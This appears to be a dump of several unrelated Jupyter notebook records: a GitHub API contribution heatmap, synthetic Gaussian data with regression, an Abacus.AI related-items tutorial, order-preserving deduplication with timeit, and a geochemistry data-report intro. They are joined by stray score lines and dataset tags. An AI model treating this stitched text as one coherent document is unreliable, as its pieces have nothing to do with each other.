data.split()
data.replace(b'Hello', b'Hello Cruel')
data = bytearray(b'Hello World')
data
data[0:5]
data.startswith(b'Hello')
data.split()
data.replace(b'Hello', b'Hello Cruel')
| 0.233532 | 0.754553 |
# Use the GitHub API to visualize project contributions
```
import os
import re
import pandas
import requests
import matplotlib
import matplotlib.pyplot as plt
import seaborn
%matplotlib inline
```
## Utilities for querying the GitHub API
```
def query(format_url, **kwargs):
url = format_url.format(**kwargs)
response = requests.get(url)
obj = response.json()
df = pandas.DataFrame(obj)
return df
def concat_queries(format_url, kwargs_list):
dfs = list()
for kwargs in kwargs_list:
df = query(format_url, **kwargs)
for key, value in kwargs.items():
df[key] = value
dfs.append(df)
return pandas.concat(dfs)
```
## Retrieve contribution data
```
repo_df = query('https://api.github.com/orgs/cognoma/repos')
repo_df.name.tolist()
format_url = 'https://api.github.com/repos/cognoma/{repo_name}/contributors'
kwargs_list = [{'repo_name': repo} for repo in repo_df.name]
contrib_df = concat_queries(format_url, kwargs_list)
```
## Contribution count heatmap: repository versus user
```
contrib_plot_df = (contrib_df
.pivot_table('contributions', 'repo_name', 'login', fill_value=0)
)
cmap = seaborn.cubehelix_palette(light=1, as_cmap=True, gamma=15)
ax = seaborn.heatmap(contrib_plot_df, square=True, linewidths=0.5, cmap=cmap, linecolor='#d3d3d3', xticklabels=1)
plt.xticks(rotation=90, color='#3f3f3f', fontsize=9)
plt.yticks(color='#3f3f3f', fontsize=9)
plt.ylabel('')
plt.xlabel('')
fig = ax.get_figure()
fig.set_size_inches(w=8.3, h=2.6)
fig.savefig('contribution-heatmap.png', dpi=200, bbox_inches='tight')
fig.savefig('contribution-heatmap.svg', bbox_inches='tight')
# Save user-by-repo contribution count data
contrib_plot_df.transpose().to_csv('contribution-by-repo.tsv', sep='\t')
```
## Create a total contribution summary table
```
# Extract maintainers from the repository README
path = os.path.join('..', 'README.md')
with open(path) as read_file:
readme = read_file.read()
pattern = r'@\*\*(.+?)\*\*'
maintainers = re.findall(pattern, readme)
maintainers = sorted(set(maintainers))
maintainer_df = pandas.DataFrame({'login': maintainers, 'maintainer': 1})
maintainer_df.head(2)
# Total contributions per user excluding sandbox
summary_df = (contrib_plot_df
.query("repo_name != 'sandbox'")
.sum(axis='rows')
.rename('contributions')
.reset_index()
.query('contributions > 0')
.merge(maintainer_df, how='outer')
.fillna(0)
.sort_values(['maintainer', 'contributions', 'login'], ascending=[False, False, True])
)
for column in 'contributions', 'maintainer':
summary_df[column] = summary_df[column].astype(int)
summary_df.to_csv('contributor-summary.tsv', sep='\t', index=False)
summary_df.head(2)
```
|
github_jupyter
|
import os
import re
import pandas
import requests
import matplotlib
import matplotlib.pyplot as plt
import seaborn
%matplotlib inline
def query(format_url, **kwargs):
url = format_url.format(**kwargs)
response = requests.get(url)
obj = response.json()
df = pandas.DataFrame(obj)
return df
def concat_queries(format_url, kwargs_list):
dfs = list()
for kwargs in kwargs_list:
df = query(format_url, **kwargs)
for key, value in kwargs.items():
df[key] = value
dfs.append(df)
return pandas.concat(dfs)
repo_df = query('https://api.github.com/orgs/cognoma/repos')
repo_df.name.tolist()
format_url = 'https://api.github.com/repos/cognoma/{repo_name}/contributors'
kwargs_list = [{'repo_name': repo} for repo in repo_df.name]
contrib_df = concat_queries(format_url, kwargs_list)
contrib_plot_df = (contrib_df
.pivot_table('contributions', 'repo_name', 'login', fill_value=0)
)
cmap = seaborn.cubehelix_palette(light=1, as_cmap=True, gamma=15)
ax = seaborn.heatmap(contrib_plot_df, square=True, linewidths=0.5, cmap=cmap, linecolor='#d3d3d3', xticklabels=1)
plt.xticks(rotation=90, color='#3f3f3f', fontsize=9)
plt.yticks(color='#3f3f3f', fontsize=9)
plt.ylabel('')
plt.xlabel('')
fig = ax.get_figure()
fig.set_size_inches(w=8.3, h=2.6)
fig.savefig('contribution-heatmap.png', dpi=200, bbox_inches='tight')
fig.savefig('contribution-heatmap.svg', bbox_inches='tight')
# Save user-by-repo contribution count data
contrib_plot_df.transpose().to_csv('contribution-by-repo.tsv', sep='\t')
# Extract maintainers from the repository README
path = os.path.join('..', 'README.md')
with open(path) as read_file:
readme = read_file.read()
pattern = r'@\*\*(.+?)\*\*'
maintainers = re.findall(pattern, readme)
maintainers = sorted(set(maintainers))
maintainer_df = pandas.DataFrame({'login': maintainers, 'maintainer': 1})
maintainer_df.head(2)
# Total contributions per user excluding sandbox
summary_df = (contrib_plot_df
.query("repo_name != 'sandbox'")
.sum(axis='rows')
.rename('contributions')
.reset_index()
.query('contributions > 0')
.merge(maintainer_df, how='outer')
.fillna(0)
.sort_values(['maintainer', 'contributions', 'login'], ascending=[False, False, True])
)
for column in 'contributions', 'maintainer':
summary_df[column] = summary_df[column].astype(int)
summary_df.to_csv('contributor-summary.tsv', sep='\t', index=False)
summary_df.head(2)
| 0.373419 | 0.694847 |
# Purpose
This notebook shows how to generate multivariate Gaussian data. In some experimental settings, you might find yourself having to create synthetic data to test out some algorithms. What better way to test your ideas than on a controlled multivariate Gaussian data set?
# Synthetic Data Generation
Here we generate synthetic data with 4 variables defined as follows.
* $X_0 \sim \mathcal{N}(0.0, 1.0)$
* $X_1 \sim \mathcal{N}(1.0, 1.5)$
* $X_2 \sim \mathcal{N}(-8, 2.0)$
* $Y \sim \mathcal{N}(3 + 2.5 \times X_0 + 1.8 \times X_1 + 0.3 \times X_2, 1.0)$
```
import numpy as np
np.random.seed(37)
N = 10000
x0 = np.random.normal(0, 1, N)
x1 = np.random.normal(1, 1.5, N)
x2 = np.random.normal(-8, 2.0, N)
y = np.random.normal(3 + (2.5 * x0) + (1.8 * x1) + (0.3 * x2), 1, N)
```
# Visualize Synthetic Data
Let's visualize the distribution of the variables individually.
```
%matplotlib inline
import seaborn as sns
import matplotlib.pyplot as plt
fig, ax = plt.subplots(2, 2, figsize=(15, 10))
ax = np.ravel(ax)
for n, x, a in zip(['x_0', 'x_1', 'x_2', 'y'], [x0, x1, x2, y], ax):
sns.distplot(x, ax=a)
mu = np.mean(x)
std = np.std(x)
a.set_title(r'${}$, mean={:.2f}, std={:.2f}'.format(n, mu, std))
a.set_xlabel(r'${}$'.format(n))
a.set_ylabel(r'$p({})$'.format(n))
plt.tight_layout()
```
# Learning
Let's form a data matrix from the variables and see if we can use regression to learn from the data. Note that the regression coefficients are almost perfectly recovered and the $r^2$ value is nearly 1.0.
```
data = np.concatenate([
x0.reshape(-1, 1),
x1.reshape(-1, 1),
x2.reshape(-1, 1),
y.reshape(-1, 1)], axis=1)
X = data[:, [0, 1, 2]]
y = data[:, [3]]
from sklearn.linear_model import LinearRegression
from sklearn.metrics import r2_score
model = LinearRegression()
model.fit(X, y)
print(model.intercept_)
print(model.coef_)
y_pred = model.predict(X)
print(r2_score(y, y_pred))
```
# A slightly more complicated example
Here, we synthesize data in a slightly more complicated way. Note that $Y$ now depends only on $X_2$.
* $X_0 \sim \mathcal{N}(0.0, 1.0)$
* $X_1 \sim \mathcal{N}(1.0, 1.5)$
* $X_2 \sim \mathcal{N}(2.5 \times X_0 + 1.8 \times X_1, 1.0)$
* $Y \sim \mathcal{N}(3 + 0.3 \times X_2, 1.0)$
```
N = 10000
x0 = np.random.normal(0, 1, N)
x1 = np.random.normal(1, 1.5, N)
x2 = np.random.normal(2.5 * x0 + 1.8 * x1, 1.0, N)
y = np.random.normal(3 + 0.3 * x2, 1.0, N)
fig, ax = plt.subplots(2, 2, figsize=(15, 10))
ax = np.ravel(ax)
for n, x, a in zip(['x_0', 'x_1', 'x_2', 'y'], [x0, x1, x2, y], ax):
sns.distplot(x, ax=a)
mu = np.mean(x)
std = np.std(x)
a.set_title(r'${}$, mean={:.2f}, std={:.2f}'.format(n, mu, std))
a.set_xlabel(r'${}$'.format(n))
a.set_ylabel(r'$p({})$'.format(n))
plt.tight_layout()
```
Note that the regression coefficients are recovered nearly perfectly, but the $r^2$ value is only about 0.6. The coefficients for $X_0$ and $X_1$ are basically 0 (zero).
```
data = np.concatenate([
x0.reshape(-1, 1),
x1.reshape(-1, 1),
x2.reshape(-1, 1),
y.reshape(-1, 1)], axis=1)
X = data[:, [0, 1, 2]]
y = data[:, [3]]
model = LinearRegression()
model.fit(X, y)
print(model.intercept_)
print(model.coef_)
y_pred = model.predict(X)
print(r2_score(y, y_pred))
```
# A very difficult example
Here, $X_2$ depends on $X_0$ and $X_1$, $Y$ depends on $X_2$, and $X_3$ depends on $Y$. Let's see what we get when attempting to learn a regression model from this data.
* $X_0 \sim \mathcal{N}(0.0, 1.0)$
* $X_1 \sim \mathcal{N}(1.0, 1.5)$
* $X_2 \sim \mathcal{N}(2.5 \times X_0 + 1.8 \times X_1, 1.0)$
* $Y \sim \mathcal{N}(3 + 0.3 \times X_2, 1.0)$
* $X_3 \sim \mathcal{N}(2 + 5.5 \times Y, 1.0)$
```
N = 10000
x0 = np.random.normal(0, 1, N)
x1 = np.random.normal(1, 1.5, N)
x2 = np.random.normal(2.5 * x0 + 1.8 * x1, 1, N)
y = np.random.normal(3 + 0.3 * x2, 1, N)
x3 = np.random.normal(2 + 5.5 * y, 1, N)
data = np.concatenate([
x0.reshape(-1, 1),
x1.reshape(-1, 1),
x2.reshape(-1, 1),
x3.reshape(-1, 1),
y.reshape(-1, 1)], axis=1)
X = data[:, [0, 1, 2, 3]]
y = data[:, [4]]
model = LinearRegression()
model.fit(X, y)
print(model.intercept_)
print(model.coef_)
y_pred = model.predict(X)
print(r2_score(y, y_pred))
```
Note that the only coefficient larger than 0.01 is the one for $X_3$. One may be misled into saying that $Y$ depends on $X_3$, when in fact we simulated $X_3$ from $Y$. It's interesting that $r^2$ is high, though.
|
github_jupyter
|
import numpy as np
np.random.seed(37)
N = 10000
x0 = np.random.normal(0, 1, N)
x1 = np.random.normal(1, 1.5, N)
x2 = np.random.normal(-8, 2.0, N)
y = np.random.normal(3 + (2.5 * x0) + (1.8 * x1) + (0.3 * x2), 1, N)
%matplotlib inline
import seaborn as sns
import matplotlib.pyplot as plt
fig, ax = plt.subplots(2, 2, figsize=(15, 10))
ax = np.ravel(ax)
for n, x, a in zip(['x_0', 'x_1', 'x_2', 'y'], [x0, x1, x2, y], ax):
sns.distplot(x, ax=a)
mu = np.mean(x)
std = np.std(x)
a.set_title(r'${}$, mean={:.2f}, std={:.2f}'.format(n, mu, std))
a.set_xlabel(r'${}$'.format(n))
a.set_ylabel(r'$p({})$'.format(n))
plt.tight_layout()
data = np.concatenate([
x0.reshape(-1, 1),
x1.reshape(-1, 1),
x2.reshape(-1, 1),
y.reshape(-1, 1)], axis=1)
X = data[:, [0, 1, 2]]
y = data[:, [3]]
from sklearn.linear_model import LinearRegression
from sklearn.metrics import r2_score
model = LinearRegression()
model.fit(X, y)
print(model.intercept_)
print(model.coef_)
y_pred = model.predict(X)
print(r2_score(y, y_pred))
N = 10000
x0 = np.random.normal(0, 1, N)
x1 = np.random.normal(1, 1.5, N)
x2 = np.random.normal(2.5 * x0 + 1.8 * x1, 1.0, N)
y = np.random.normal(3 + 0.3 * x2, 1.0, N)
fig, ax = plt.subplots(2, 2, figsize=(15, 10))
ax = np.ravel(ax)
for n, x, a in zip(['x_0', 'x_1', 'x_2', 'y'], [x0, x1, x2, y], ax):
sns.distplot(x, ax=a)
mu = np.mean(x)
std = np.std(x)
a.set_title(r'${}$, mean={:.2f}, std={:.2f}'.format(n, mu, std))
a.set_xlabel(r'${}$'.format(n))
a.set_ylabel(r'$p({})$'.format(n))
plt.tight_layout()
data = np.concatenate([
x0.reshape(-1, 1),
x1.reshape(-1, 1),
x2.reshape(-1, 1),
y.reshape(-1, 1)], axis=1)
X = data[:, [0, 1, 2]]
y = data[:, [3]]
model = LinearRegression()
model.fit(X, y)
print(model.intercept_)
print(model.coef_)
y_pred = model.predict(X)
print(r2_score(y, y_pred))
N = 10000
x0 = np.random.normal(0, 1, N)
x1 = np.random.normal(1, 1.5, N)
x2 = np.random.normal(2.5 * x0 + 1.8 * x1, 1, N)
y = np.random.normal(3 + 0.3 * x2, 1, N)
x3 = np.random.normal(2 + 5.5 * y, 1, N)
data = np.concatenate([
x0.reshape(-1, 1),
x1.reshape(-1, 1),
x2.reshape(-1, 1),
x3.reshape(-1, 1),
y.reshape(-1, 1)], axis=1)
X = data[:, [0, 1, 2, 3]]
y = data[:, [4]]
model = LinearRegression()
model.fit(X, y)
print(model.intercept_)
print(model.coef_)
y_pred = model.predict(X)
print(r2_score(y, y_pred))
| 0.651133 | 0.987664 |
## How-to guide for Related Items use-case on Abacus.AI platform
This notebook provides you with a hands-on environment to build a model that suggests related items using the Abacus.AI Python Client Library.
We'll be using the [User Item Recommendations](https://s3.amazonaws.com//realityengines.exampledatasets/user_recommendations/user_movie_ratings.csv), [Movie Attributes](https://s3.amazonaws.com//realityengines.exampledatasets/user_recommendations/movies_metadata.csv), and [User Attributes](https://s3.amazonaws.com//realityengines.exampledatasets/user_recommendations/users_metadata.csv) datasets, each of which has information about the user and/or their choice of movies.
1. Install the Abacus.AI library.
```
!pip install abacusai
```
We'll also import pandas and pprint tools for visualization in this notebook.
```
import pandas as pd # A tool we'll use to download and preview CSV files
import pprint # A tool to pretty print dictionary outputs
pp = pprint.PrettyPrinter(indent=2)
```
2. Add your Abacus.AI [API Key](https://abacus.ai/app/profile/apikey) generated using the API dashboard as follows:
```
#@title Abacus.AI API Key
api_key = '' #@param {type: "string"}
```
3. Import the Abacus.AI library and instantiate a client.
```
from abacusai import ApiClient
client = ApiClient(api_key)
```
## 1. Create a Project
Abacus.AI projects are containers that have datasets and trained models. By specifying a business **Use Case**, Abacus.AI tailors the deep learning algorithms to produce the best performing model possible for your data.
We'll call the `list_use_cases` method to retrieve a list of the available Use Cases currently available on the Abacus.AI platform.
```
client.list_use_cases()
```
In this notebook, we're going to create a model that suggests related items using the User Item Recommendations, Movie Attributes, and User Attributes datasets. The 'USER_RELATED' use case is best tailored for this situation. As a worked example, we will use the IMDB movie dataset, which has movie metadata, user metadata, and user-movie ratings.
```
#@title Abacus.AI Use Case
use_case = 'USER_RELATED' #@param {type: "string"}
```
By calling the `describe_use_case_requirements` method we can view what datasets are required for this use_case.
```
for requirement in client.describe_use_case_requirements(use_case):
pp.pprint(requirement.to_dict())
```
Finally, let's create the project.
```
related_items_project = client.create_project(name='Related Movies', use_case=use_case)
related_items_project.to_dict()
```
**Note: When feature_groups_enabled is False, the use case does not support feature groups (collections of ML features). In that case, datasets are created at the organization level and tied to a project so they can be used for training ML models**
## 2. Add Datasets to your Project
Abacus.AI can read datasets directly from `AWS S3` or `Google Cloud Storage` buckets, otherwise you can also directly upload and store your datasets with Abacus.AI. For this notebook, we will have Abacus.AI read the datasets directly from a public S3 bucket's location.
We are using three datasets for this notebook. We'll tell Abacus.AI how the datasets should be used when creating it by tagging each dataset with a special Abacus.AI **Dataset Type**.
- [User Item Recommendations](https://s3.amazonaws.com//realityengines.exampledatasets/user_recommendations/user_movie_ratings.csv) (**USER_ITEM_INTERACTIONS**):
This dataset contains information about multiple users' ratings of movies with specified IDs.
- [Movie Attributes](https://s3.amazonaws.com//realityengines.exampledatasets/user_recommendations/movies_metadata.csv) (**CATALOG_ATTRIBUTES**): This dataset contains attributes about movies with specified IDs, such as each movie's name and genre.
- [User Attributes](https://s3.amazonaws.com//realityengines.exampledatasets/user_recommendations/users_metadata.csv) (**USER_ATTRIBUTES**): This dataset contains information about users with specified IDs, such as their age, gender, occupation, and zip code.
### Add the datasets to Abacus.AI
First we'll use Pandas to preview the files, then add them to Abacus.AI.
```
pd.read_csv('https://s3.amazonaws.com//realityengines.exampledatasets/user_recommendations/user_movie_ratings.csv')
pd.read_csv('https://s3.amazonaws.com//realityengines.exampledatasets/user_recommendations/movies_metadata.csv')
pd.read_csv('https://s3.amazonaws.com//realityengines.exampledatasets/user_recommendations/users_metadata.csv')
```
Using the Create Dataset API, we can tell Abacus.AI the public S3 URI of where to find the datasets. We will also give each dataset a Refresh Schedule, which tells Abacus.AI when it should refresh the dataset (take an updated/latest copy of the dataset).
If you're unfamiliar with Cron Syntax, Crontab Guru can help translate the syntax back into natural language: [https://crontab.guru/#0_12_\*_\*_\*](https://crontab.guru/#0_12_*_*_*)
**Note: This cron string will be evaluated in UTC time zone**
```
user_item_dataset = client.create_dataset_from_file_connector(name='User Item Recommendations', table_name='User_Item_Recommendations',
location='s3://realityengines.exampledatasets/user_recommendations/user_movie_ratings.csv',
refresh_schedule='0 12 * * *')
movie_attributes_dataset = client.create_dataset_from_file_connector(name='Movie Attributes', table_name='Movie_Attributes',
location='s3://realityengines.exampledatasets/user_recommendations/movies_metadata.csv',
refresh_schedule='0 12 * * *')
user_attributes_dataset = client.create_dataset_from_file_connector(name='User Attributes', table_name='User_Attributes',
location='s3://realityengines.exampledatasets/user_recommendations/users_metadata.csv',
refresh_schedule='0 12 * * *')
datasets = [user_item_dataset, movie_attributes_dataset, user_attributes_dataset]
for dataset in datasets:
dataset.wait_for_inspection()
```
## 3. Create Feature Groups and add them to your Project
Datasets are created at the organization level and can be used to create feature groups as follows:
```
feature_group = client.create_feature_group(table_name='Related_Items1',sql='select * from User_Item_Recommendations')
```
Adding Feature Group to the project:
```
client.add_feature_group_to_project(feature_group_id=feature_group.feature_group_id,project_id = related_items_project.project_id)
```
Setting the Feature Group type according to the use case requirements:
```
client.set_feature_group_type(feature_group_id=feature_group.feature_group_id, project_id = related_items_project.project_id, feature_group_type= "USER_ITEM_INTERACTIONS")
```
Check current Feature Group schema:
```
client.get_feature_group_schema(feature_group_id=feature_group.feature_group_id)
```
#### For each **Use Case**, there are special **Column Mappings** that must be applied to a column to fulfill use case requirements. We can find the list of available **Column Mappings** by calling the *Describe Use Case Requirements* API:
```
client.describe_use_case_requirements(use_case)[0].allowed_feature_mappings
client.set_feature_mapping(project_id=related_items_project.project_id, feature_group_id= feature_group.feature_group_id, feature_name='movie_id', feature_mapping='ITEM_ID')
client.set_feature_mapping(project_id=related_items_project.project_id, feature_group_id= feature_group.feature_group_id,feature_name='user_id', feature_mapping='USER_ID')
client.set_feature_mapping(project_id=related_items_project.project_id, feature_group_id= feature_group.feature_group_id,feature_name='timestamp', feature_mapping='TIMESTAMP')
```
For each required Feature Group Type within the use case, you must assign the Feature group to be used for training the model:
```
client.use_feature_group_for_training(project_id=related_items_project.project_id, feature_group_id=feature_group.feature_group_id)
```
Now that we have our feature groups assigned, we're almost ready to train a model!
To be sure that our project is ready to go, let's call project.validate to confirm that all the project requirements have been met:
```
related_items_project.validate()
```
## 4. Train a Model
For each **Use Case**, Abacus.AI has a bunch of options for training. We can call the *Get Training Config Options* API to see the available options.
```
related_items_project.get_training_config_options()
```
In this notebook, we'll just train with the default options, but definitely feel free to experiment, especially if you have familiarity with Machine Learning.
```
related_items_model = related_items_project.train_model(training_config={})
related_items_model.to_dict()
```
After we start training the model, we can call this blocking call that routinely checks the status of the model until it is trained and evaluated:
```
related_items_model.wait_for_evaluation()
```
**Note that model training might take anywhere from a few minutes to a few hours, depending upon the size of the datasets, the complexity of the models being trained, and a variety of other factors**
## **Checkpoint** [Optional]
As model training can take hours to complete, your page could time out or you might end up hitting the refresh button; this section helps you restore your progress:
```
!pip install abacusai
import pandas as pd
import pprint
pp = pprint.PrettyPrinter(indent=2)
api_key = '' #@param {type: "string"}
from abacusai import ApiClient
client = ApiClient(api_key)
related_items_project = next(project for project in client.list_projects() if project.name == 'Related Movies')
related_items_model = related_items_project.list_models()[-1]
related_items_model.wait_for_evaluation()
```
## Evaluate your Model Metrics
After your model is done training you can inspect the model's quality by reviewing the model's metrics:
```
pp.pprint(related_items_model.get_metrics().to_dict())
```
To get a better understanding on what these metrics mean, visit our [documentation](https://abacus.ai/app/help/useCases/USER_RELATED/training) page.
## 5. Deploy Model
After the model has been trained, we need to deploy the model to be able to start making predictions. Deploying a model will reserve cloud resources to host the model for Realtime and/or batch predictions.
```
related_items_deployment = client.create_deployment(name='Related Items Deployment',description='Related Items Deployment',model_id=related_items_model.model_id)
related_items_deployment.wait_for_deployment()
```
After the model is deployed, we need to create a deployment token for authenticating prediction requests. This token is only authorized to predict on deployments in this project, so it's safe to embed this token inside of a user-facing application or website.
```
deployment_token = related_items_project.create_deployment_token().deployment_token
deployment_token
```
## 6. Predict
Now that you have an active deployment and a deployment token to authenticate requests, you can make the `get_related_items` API call below.
This command will return a list of related items based on the provided user_id (1) and movie_id (466). The related items list would be determined based on what movies the user liked in the past and how the movies and users are related to each other depending on their attributes.
```
ApiClient().get_related_items(deployment_token=deployment_token,
deployment_id=related_items_deployment.deployment_id,
query_data={"user_id":"1","movie_id":"466"})
```
|
github_jupyter
|
!pip install abacusai
import pandas as pd # A tool we'll use to download and preview CSV files
import pprint # A tool to pretty print dictionary outputs
pp = pprint.PrettyPrinter(indent=2)
#@title Abacus.AI API Key
api_key = '' #@param {type: "string"}
from abacusai import ApiClient
client = ApiClient(api_key)
client.list_use_cases()
#@title Abacus.AI Use Case
use_case = 'USER_RELATED' #@param {type: "string"}
for requirement in client.describe_use_case_requirements(use_case):
pp.pprint(requirement.to_dict())
related_items_project = client.create_project(name='Related Movies', use_case=use_case)
related_items_project.to_dict()
pd.read_csv('https://s3.amazonaws.com//realityengines.exampledatasets/user_recommendations/user_movie_ratings.csv')
pd.read_csv('https://s3.amazonaws.com//realityengines.exampledatasets/user_recommendations/movies_metadata.csv')
pd.read_csv('https://s3.amazonaws.com//realityengines.exampledatasets/user_recommendations/users_metadata.csv')
user_item_dataset = client.create_dataset_from_file_connector(name='User Item Recommendations', table_name='User_Item_Recommendations',
location='s3://realityengines.exampledatasets/user_recommendations/user_movie_ratings.csv',
refresh_schedule='0 12 * * *')
movie_attributes_dataset = client.create_dataset_from_file_connector(name='Movie Attributes', table_name='Movie_Attributes',
location='s3://realityengines.exampledatasets/user_recommendations/movies_metadata.csv',
refresh_schedule='0 12 * * *')
user_attributes_dataset = client.create_dataset_from_file_connector(name='User Attributes', table_name='User_Attributes',
location='s3://realityengines.exampledatasets/user_recommendations/users_metadata.csv',
refresh_schedule='0 12 * * *')
datasets = [user_item_dataset, movie_attributes_dataset, user_attributes_dataset]
for dataset in datasets:
dataset.wait_for_inspection()
feature_group = client.create_feature_group(table_name='Related_Items1',sql='select * from User_Item_Recommendations')
client.add_feature_group_to_project(feature_group_id=feature_group.feature_group_id,project_id = related_items_project.project_id)
client.set_feature_group_type(feature_group_id=feature_group.feature_group_id, project_id = related_items_project.project_id, feature_group_type= "USER_ITEM_INTERACTIONS")
client.get_feature_group_schema(feature_group_id=feature_group.feature_group_id)
client.describe_use_case_requirements(use_case)[0].allowed_feature_mappings
client.set_feature_mapping(project_id=related_items_project.project_id, feature_group_id= feature_group.feature_group_id, feature_name='movie_id', feature_mapping='ITEM_ID')
client.set_feature_mapping(project_id=related_items_project.project_id, feature_group_id= feature_group.feature_group_id,feature_name='user_id', feature_mapping='USER_ID')
client.set_feature_mapping(project_id=related_items_project.project_id, feature_group_id= feature_group.feature_group_id,feature_name='timestamp', feature_mapping='TIMESTAMP')
client.use_feature_group_for_training(project_id=related_items_project.project_id, feature_group_id=feature_group.feature_group_id)
related_items_project.validate()
related_items_project.get_training_config_options()
related_items_model = related_items_project.train_model(training_config={})
related_items_model.to_dict()
related_items_model.wait_for_evaluation()
!pip install abacusai
import pandas as pd
import pprint
pp = pprint.PrettyPrinter(indent=2)
api_key = '' #@param {type: "string"}
from abacusai import ApiClient
client = ApiClient(api_key)
related_items_project = next(project for project in client.list_projects() if project.name == 'Related Movies')
related_items_model = related_items_project.list_models()[-1]
related_items_model.wait_for_evaluation()
pp.pprint(related_items_model.get_metrics().to_dict())
related_items_deployment = client.create_deployment(name='Related Items Deployment',description='Related Items Deployment',model_id=related_items_model.model_id)
related_items_deployment.wait_for_deployment()
deployment_token = related_items_project.create_deployment_token().deployment_token
deployment_token
ApiClient().get_related_items(deployment_token=deployment_token,
deployment_id=related_items_deployment.deployment_id,
query_data={"user_id":"1","movie_id":"466"})
| 0.321247 | 0.972257 |
# Remove Duplicates From A Sequence
While you can sort an iterable to make duplicates easy to drop, the result no longer keeps the original sequence.
Here are a couple of options to remove dupes and still keep your sequence.
<div class="alert alert-info">
<b>Assume the following...</b>
```python
temp_list = ['duck', 'cat', 'dog', 'deer', 'fish', 'dog', 'rooster', 'lion', 'deer']
```
</div>
<div class="alert alert-success">
<b>Option 1</b>
```python
def filter_list(input_list:list):
"""
This function takes in an iterable (tested only for lists).
Returns the same list in order but without duplicates.
"""
temp_list = []
for item in input_list:
if item in temp_list:
continue
temp_list.append(item)
return temp_list
print(filter_list(temp_list))
```
</div>
Here's an alternative that can be used only if the values in the sequence are [hashable](https://docs.python.org/3/glossary.html)...
That means the value never changes and can be compared to other objects.
<div class="alert alert-success">
<b>Option 2</b>
```python
temp_list = ['duck', 'cat', 'dog', 'deer', 'fish', 'dog', 'rooster', 'lion', 'deer']
def filter_list2(input_data):
"""
This function takes in a sequence.
Returns the same list in order but without duplicates.
"""
found = set()
for item in input_data:
if item not in found:
yield item
found.add(item) # no need to keep sequence of what's been seen
print(list(filter_list2(temp_list)))
```
</div>
And as always, there is more than one way to code - just [check this out](https://www.peterbe.com/plog/uniqifiers-benchmark)!
Now for the examples above ...
They both have the same number of lines of code ...
Is there a difference?
How can you know which is better?
By testing!
You can [check out these python speed/performance tips](https://wiki.python.org/moin/PythonSpeed/PerformanceTips), use [timeit](https://docs.python.org/3/library/timeit.html), and for the real nitty gritty? Checkout [python profilers](https://docs.python.org/3/library/profile.html).
<div class="alert alert-info">
<b>Try this for Option 1!</b>
```python
import timeit
SETUP = '''def filter_list(input_list:list):
"""
This function takes in an iterable (tested only for lists).
Returns the same list in order but without duplicates.
"""
temp_list = []
for item in input_list:
if item in temp_list:
continue
temp_list.append(item)
return temp_list'''
TEST_CODE = '''filter_list(['duck', 'cat', 'dog', 'deer', 'fish', 'dog', 'rooster', 'lion', 'deer'])'''
print(timeit.timeit(setup=SETUP, stmt=TEST_CODE))
```
</div>
```
temp_list = ['duck', 'cat', 'dog', 'deer', 'fish', 'dog', 'rooster', 'lion', 'deer']
def filter_list2(input_data):
"""
This function takes in a sequence.
Returns the same list in order but without duplicates.
"""
found = set()
for item in input_data:
if item not in found:
yield item
found.add(item) # no need to keep sequence of what's been seen
print(list(filter_list2(temp_list)))
```
<div class="alert alert-info">
<b>Try this for Option 2!</b>
```python
import timeit
SETUP = '''def filter_list2(input_data):
"""
This function takes in a sequence.
Returns the same list in order but without duplicates.
"""
found = set()
for item in input_data:
if item not in found:
yield item
found.add(item) # no need to keep sequence of what's been seen'''
TEST_CODE = '''list(filter_list2(['duck', 'cat', 'dog', 'deer', 'fish', 'dog', 'rooster', 'lion', 'deer']))'''
print(timeit.timeit(setup=SETUP, stmt=TEST_CODE))
```
</div>
So even though it's fancy ... is it better? Not with this small set. But it might be for a larger one or a different kind of sequence.
That's why it's important to know how to test your code and determine which tricks might be best for your needs.
## What About A List Of Dictionaries?
(to be continued ...)
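In the meantime, a quick teaser: dictionaries aren't hashable, so the set-based generator above can't track them directly. One common workaround (a sketch, not the only option) is to key each dict on an immutable view of its items.
```
def filter_dicts(input_data):
    """
    Remove duplicate dicts from a sequence while preserving order.
    Assumes the dict values themselves are hashable.
    """
    found = set()
    for item in input_data:
        key = frozenset(item.items())  # order-independent, immutable view of the dict
        if key not in found:
            yield item
            found.add(key)

pets = [{'name': 'duck'}, {'name': 'cat'}, {'name': 'duck'}]
print(list(filter_dicts(pets)))
```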
|
github_jupyter
|
temp_list = ['duck', 'cat', 'dog', 'deer', 'fish', 'dog', 'rooster', 'lion', 'deer']
def filter_list(input_list:list):
"""
This function takes in an iterable (tested only for lists).
Returns the same list in order but without duplicates.
"""
temp_list = []
for item in input_list:
if item in temp_list:
continue
temp_list.append(item)
return temp_list
print(filter_list(temp_list))
temp_list = ['duck', 'cat', 'dog', 'deer', 'fish', 'dog', 'rooster', 'lion', 'deer']
def filter_list2(input_data):
"""
This function takes in a sequence.
Returns the same list in order but without duplicates.
"""
found = set()
for item in input_data:
if item not in found:
yield item
found.add(item) # no need to keep sequence of what's been seen
print(list(filter_list2(temp_list)))
import timeit
SETUP = '''def filter_list(input_list:list):
"""
This function takes in an iterable (tested only for lists).
Returns the same list in order but without duplicates.
"""
temp_list = []
for item in input_list:
if item in temp_list:
continue
temp_list.append(item)
return temp_list'''
TEST_CODE = '''filter_list(['duck', 'cat', 'dog', 'deer', 'fish', 'dog', 'rooster', 'lion', 'deer'])'''
print(timeit.timeit(setup=SETUP, stmt=TEST_CODE))
temp_list = ['duck', 'cat', 'dog', 'deer', 'fish', 'dog', 'rooster', 'lion', 'deer']
def filter_list2(input_data):
"""
This function takes in a sequence.
Returns the same list in order but without duplicates.
"""
found = set()
for item in input_data:
if item not in found:
yield item
found.add(item) # no need to keep sequence of what's been seen
print(list(filter_list2(temp_list)))
import timeit
SETUP = '''def filter_list2(input_data):
"""
This function takes in a sequence.
Returns the same list in order but without duplicates.
"""
found = set()
for item in input_data:
if item not in found:
yield item
found.add(item) # no need to keep sequence of what's been seen'''
TEST_CODE = '''list(filter_list2(['duck', 'cat', 'dog', 'deer', 'fish', 'dog', 'rooster', 'lion', 'deer']))'''
print(timeit.timeit(setup=SETUP, stmt=TEST_CODE))
| 0.39129 | 0.898411 |
# Data Reporting and Communication - Geochemistry Example
This notebook is an example of going through the data report process to illustrate some aspects you may want to highlight (see the other pm notebook). This example data report is principally based on data which is relatively clean already - to highlight the key parts of the exercise without getting bogged down in the details of data munging which are often dataset specific.
## Read the Docs
As we're working with new datasets, new types of data, and different domains, you might want to put together an analysis or visualisation which we haven't yet encountered. We'd suggest that you check out the documentation pages for some of the key packages if you're after something specific, or if you run into an error you can trace back to these libraries:
